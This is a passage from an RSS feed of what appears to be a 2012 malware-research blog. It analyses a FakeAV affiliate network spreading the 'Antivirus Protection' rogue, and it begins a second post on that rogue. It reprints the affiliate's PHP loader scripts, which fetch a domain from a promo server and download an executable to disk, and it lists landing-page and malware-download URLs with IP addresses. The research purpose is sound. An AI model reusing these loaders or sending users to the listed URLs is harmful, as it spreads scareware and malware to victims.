#b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #339933;"&gt;!&lt;/span&gt;&lt;span style="color: #000088;"&gt;$actual_domain&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt; my_error&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;"Can't get domain."&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$exe_url&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;span style="color: blue;"&gt;"http://&lt;span style="color: #006699; font-weight: bold;"&gt;$actual_domain&lt;/span&gt;/ldpatch/softpatch.php?afid="&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: #000088;"&gt;$afid&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$baka_exe&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;a href="http://www.php.net/file_get_contents" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;file_get_contents&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$exe_url&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;a href="http://www.php.net/strlen" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;strlen&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$baka_exe&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &lt;span style="color: #000088;"&gt;$h&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;a href="http://www.php.net/fopen" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fopen&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$fileName&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;span style="color: blue;"&gt;"w"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &lt;a href="http://www.php.net/fwrite" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fwrite&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;span style="color: #000088;"&gt;$baka_exe&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &lt;a href="http://www.php.net/fclose" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fclose&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt; &amp;nbsp; &amp;nbsp; &lt;br /&gt;&amp;nbsp; &amp;nbsp; &lt;span style="color: #b1b100;"&gt;echo&lt;/span&gt; &lt;span style="color: blue;"&gt;"OK"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;span style="color: #b1b100;"&gt;else&lt;/span&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; my_error&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;"Can't get exe."&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;&lt;a href="http://www.php.net/exit" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;exit&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;////////////////////////////////////////////////////////////////////////////////&lt;/span&gt;&lt;br /&gt;&lt;span style="color: black; font-weight: bold;"&gt;function&lt;/span&gt; my_error&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$error_str&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: #b1b100;"&gt;echo&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;"Update baka - Error:"&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: #000088;"&gt;$error_str&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: blue;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\r&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="http://www.php.net/exit" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;exit&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: black; font-weight: bold;"&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;load2.txt:&lt;br /&gt;&lt;div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;&lt;span style="color: black; font-weight: bold;"&gt;&amp;lt;?php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;/*&lt;br /&gt;&amp;nbsp;* Load2&lt;br /&gt;&amp;nbsp;* записает актуальный домен в файл &lt;br /&gt;&amp;nbsp;* &lt;br /&gt;&amp;nbsp;*/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$fileDomain&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;span style="color: blue;"&gt;"domain.1"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$urlActualDomain&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: blue;"&gt;"http://net-wintools.biz/promo/domain/?category=1&amp;amp;api_key=[you_api_key]"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$actual_domain&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;a href="http://www.php.net/file" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;file&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$urlActualDomain&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;if&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;a href="http://www.php.net/sizeof" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;sizeof&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$actual_domain&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;==&lt;/span&gt; &lt;span style="color: #cc66cc;"&gt;0&lt;/span&gt; &lt;span style="color: #009900;"&gt;)&lt;/span&gt; my_error&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;"Can't get domain."&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;a href="http://www.php.net/fopen" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fopen&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$fileDomain&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;span style="color: blue;"&gt;"w"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$text&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;a href="http://www.php.net/implode" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;implode&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;""&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt; &lt;span style="color: #000088;"&gt;$actual_domain&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.php.net/fwrite" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fwrite&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;span style="color: blue;"&gt;"http://"&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: #000088;"&gt;$text&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.php.net/fclose" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fclose&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;echo&lt;/span&gt; &lt;span style="color: blue;"&gt;"OK"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.php.net/exit" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;exit&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;////////////////////////////////////////////////////////////////////////////////&lt;/span&gt;&lt;br /&gt;&lt;span style="color: black; font-weight: bold;"&gt;function&lt;/span&gt; my_error&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$error_str&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;{&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: #b1b100;"&gt;echo&lt;/span&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;"Update baka - Error:"&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: #000088;"&gt;$error_str&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: blue;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\r&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="http://www.php.net/exit" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;exit&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #009900;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;////////////////////////////////////////////////////////////////////////////////&lt;/span&gt;&lt;br /&gt;&lt;span style="color: black; font-weight: bold;"&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;load3.txt&lt;br /&gt;&lt;div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;&lt;span style="color: black; font-weight: bold;"&gt;&amp;lt;?php&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;/* &lt;br /&gt;&amp;nbsp;* &amp;nbsp;Load3&lt;br /&gt;&amp;nbsp;*&amp;nbsp; дописает к урл ( например /scanner15/?afid=3)&lt;br /&gt;&amp;nbsp;*/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$fileName&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;span style="color: blue;"&gt;"my_file.1"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$urlActualDomain&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: blue;"&gt;"http://net-wintools.biz/promo/domain/?category=1&amp;amp;api_key=[you_api_key]"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;a href="http://www.php.net/fopen" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fopen&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$fileName&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;span style="color: blue;"&gt;"w"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$text&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;a href="http://www.php.net/file" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;file&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$urlActualDomain&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$text&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;a href="http://www.php.net/implode" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;implode&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;""&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt; &lt;span style="color: #000088;"&gt;$text&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.php.net/fwrite" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fwrite&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt;&lt;span style="color: #339933;"&gt;,&lt;/span&gt;&lt;span style="color: blue;"&gt;"http://"&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: #000088;"&gt;$text&lt;/span&gt;&lt;span style="color: #339933;"&gt;.&lt;/span&gt;&lt;span style="color: blue;"&gt;"/scanner15/?afid=3"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.php.net/fclose" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;fclose&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$h&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #b1b100;"&gt;echo&lt;/span&gt; &lt;span style="color: blue;"&gt;"OK"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.php.net/exit" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;exit&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: black; font-weight: bold;"&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;This Affiliate spread actually &lt;a href="http://xylibox.blogspot.com/2012/03/antivirus-protection-2012.html"&gt;Antivirus Protection&lt;/a&gt; (&lt;a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=75&amp;amp;start=450#p12017"&gt;if you want the sample&lt;/a&gt;)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-EhIuqpeiKE8/T1fp-y3fOZI/AAAAAAAAFc4/OwSlsvdts3Q/s1600/AntivirusProtection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="318" src="http://2.bp.blogspot.com/-EhIuqpeiKE8/T1fp-y3fOZI/AAAAAAAAFc4/OwSlsvdts3Q/s400/AntivirusProtection.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-sFgz2wgYgow/T1fzDwH-vII/AAAAAAAAFdo/xlZoyX9PnXQ/s1600/ragecomic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="295" src="http://1.bp.blogspot.com/-sFgz2wgYgow/T1fzDwH-vII/AAAAAAAAFdo/xlZoyX9PnXQ/s400/ragecomic.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Landing pages:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;• dns: 1 » ip: 31.184.234.89 - adresse: SPACEIN-WEB1.UNI.ME&lt;br /&gt;http://spacein-web1.uni.me/monitor10/?www=465&lt;br /&gt;http://spacein-web1.uni.me/monitor11/?www=465&lt;br /&gt;http://spacein-web1.uni.me/monitor15/?www=465&lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 46.21.159.175 - adresse: VIDEO-NKLPC1.TK&lt;br /&gt;http://video-nklpc1.tk/xxx2/?www=465&lt;br /&gt;http://video-nklpc1.tk/xxx5/?www=465&lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ3.TK&lt;br /&gt;• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ4.TK &lt;br /&gt;http://uber-scanpcxz3.tk/monitor10/?www=465&lt;br /&gt;http://uber-scanpcxz3.tk/monitor11/?www=465&lt;br /&gt;http://uber-scanpcxz3.tk/monitor15/?www=465&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-d7su8NP4mmI/T1fucRsmBKI/AAAAAAAAFdA/vHg58ITlIAo/s1600/landing1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-d7su8NP4mmI/T1fucRsmBKI/AAAAAAAAFdA/vHg58ITlIAo/s400/landing1.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-UCNWP12q4wU/T1fugrd55gI/AAAAAAAAFdI/X5AAQLVeKF0/s1600/Landing2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-UCNWP12q4wU/T1fugrd55gI/AAAAAAAAFdI/X5AAQLVeKF0/s400/Landing2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-RU62ZAJpG7A/T1fumf3mtUI/AAAAAAAAFdQ/LPstpMXW4fA/s1600/Landing3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-RU62ZAJpG7A/T1fumf3mtUI/AAAAAAAAFdQ/LPstpMXW4fA/s400/Landing3.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-9qxjkciWNKg/T1fuqkhyZ0I/AAAAAAAAFdY/Oys6TGmKd2U/s1600/Landing4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-9qxjkciWNKg/T1fuqkhyZ0I/AAAAAAAAFdY/Oys6TGmKd2U/s400/Landing4.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Psg-HMkLLQI/T1fuwP43NVI/AAAAAAAAFdg/-FqU04Ov_iM/s1600/Landing5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-Psg-HMkLLQI/T1fuwP43NVI/AAAAAAAAFdg/-FqU04Ov_iM/s400/Landing5.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Malware dowload:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;• dns: 1 » ip: 83.149.112.46 - adresse: GOADVANCED-SOFTZ.IN &lt;br /&gt;http://goadvanced-softz.in/sis/spch.php?www=465&lt;br /&gt;http://goadvanced-softz.in/sis/in/out/465.exe &lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 205.204.87.27 - adresse: WHITE-DOGGYSOFT.IN&lt;br /&gt;http://white-doggysoft.in/sis/spch.php?www=465 &lt;br /&gt;http://white-doggysoft.in/sis/in/out/465.exe&lt;br /&gt;http://white-doggysoft.in/soft/loader.exe&lt;br /&gt;http://white-doggysoft.in/soft/installer_m.exe&lt;/div&gt;&lt;br /&gt;Also a weird string was found in the promo server: &lt;b&gt;Projects/BakaSoft/wdd2010.com/promo_new/trunk/htdocs&lt;/b&gt;&lt;br /&gt;Maybe it's the same program or maybe he payed the&amp;nbsp; people of BakaSoft and they selled the system.&lt;br /&gt;&lt;br /&gt;Index Of/&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-1ufmJ_TGO1E/T1oN5TC0qII/AAAAAAAAFeI/iG6Yl5pn0l8/s1600/indexof.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="153" src="http://4.bp.blogspot.com/-1ufmJ_TGO1E/T1oN5TC0qII/AAAAAAAAFeI/iG6Yl5pn0l8/s400/indexof.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5XmOVmEG12k/T1oOP6KJaoI/AAAAAAAAFeQ/R7R-TS2vrQU/s1600/indexof2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="186" src="http://2.bp.blogspot.com/-5XmOVmEG12k/T1oOP6KJaoI/AAAAAAAAFeQ/R7R-TS2vrQU/s400/indexof2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-417434944384553328?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/fakeav-affiliate-who-spread-zaxar.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-JJTTE0uEd0s/T1foirdOIxI/AAAAAAAAFcY/e41VQWvnsMw/s72-c/bhadvert.PNG" height="72" width="72" /><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8568882720096404748</guid><pubDate>Fri, 09 Mar 2012 14:32:00 +0000</pubDate><atom:updated>2012-03-09T15:58:06.265+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Antivirus Protection</category><category domain="http://www.blogger.com/atom/ns#">Zaxar</category><title>Antivirus Protection</title><description>&lt;img border="0" src="http://3.bp.blogspot.com/-YVe3mcYAKSU/T1fe6zYsywI/AAAAAAAAFbQ/qUwJE00jZ5A/s1600/icons.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;According to &lt;a href="http://siri-urz.blogspot.com/2012/02/antivirus-protection.html"&gt;S!Ri&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Antivirus Protection&lt;/b&gt; is a fake security software (rogue). It is from the same family as: &lt;b&gt;Security Monitor 2012&lt;/b&gt;, &lt;b&gt;Security Solution 2011&lt;/b&gt;, &lt;b&gt;Antivirus Antispyware 2011&lt;/b&gt;, &lt;b&gt;AntiVirus System 2011&lt;/b&gt;, &lt;b&gt;Security Inspector 2010&lt;/b&gt;, &lt;b&gt;AntiVirus Studio 2010&lt;/b&gt;, &lt;b&gt;Desktop Security 2010&lt;/b&gt;, &lt;b&gt;Total PC Defender 2010&lt;/b&gt;, &lt;b&gt;Desktop Defender 2010&lt;/b&gt;, &lt;b&gt;Contraviro&lt;/b&gt;, &lt;b&gt;UnVirex&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-FE_0qrHdfLU/T1fWbOnIaTI/AAAAAAAAFao/wngfYZyeraY/s1600/AntivirusProtection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="318" src="http://1.bp.blogspot.com/-FE_0qrHdfLU/T1fWbOnIaTI/AAAAAAAAFao/wngfYZyeraY/s400/AntivirusProtection.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Fake BSoD&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-X7fVXMax1QU/T1fWyxdVi-I/AAAAAAAAFbA/byYMt8ilFPc/s1600/wtf.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/-X7fVXMax1QU/T1fWyxdVi-I/AAAAAAAAFbA/byYMt8ilFPc/s400/wtf.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Unpack&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-7wkV3ff6E3o/T1fWhkNW7ZI/AAAAAAAAFaw/jS858_X78lE/s1600/unpacking.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" 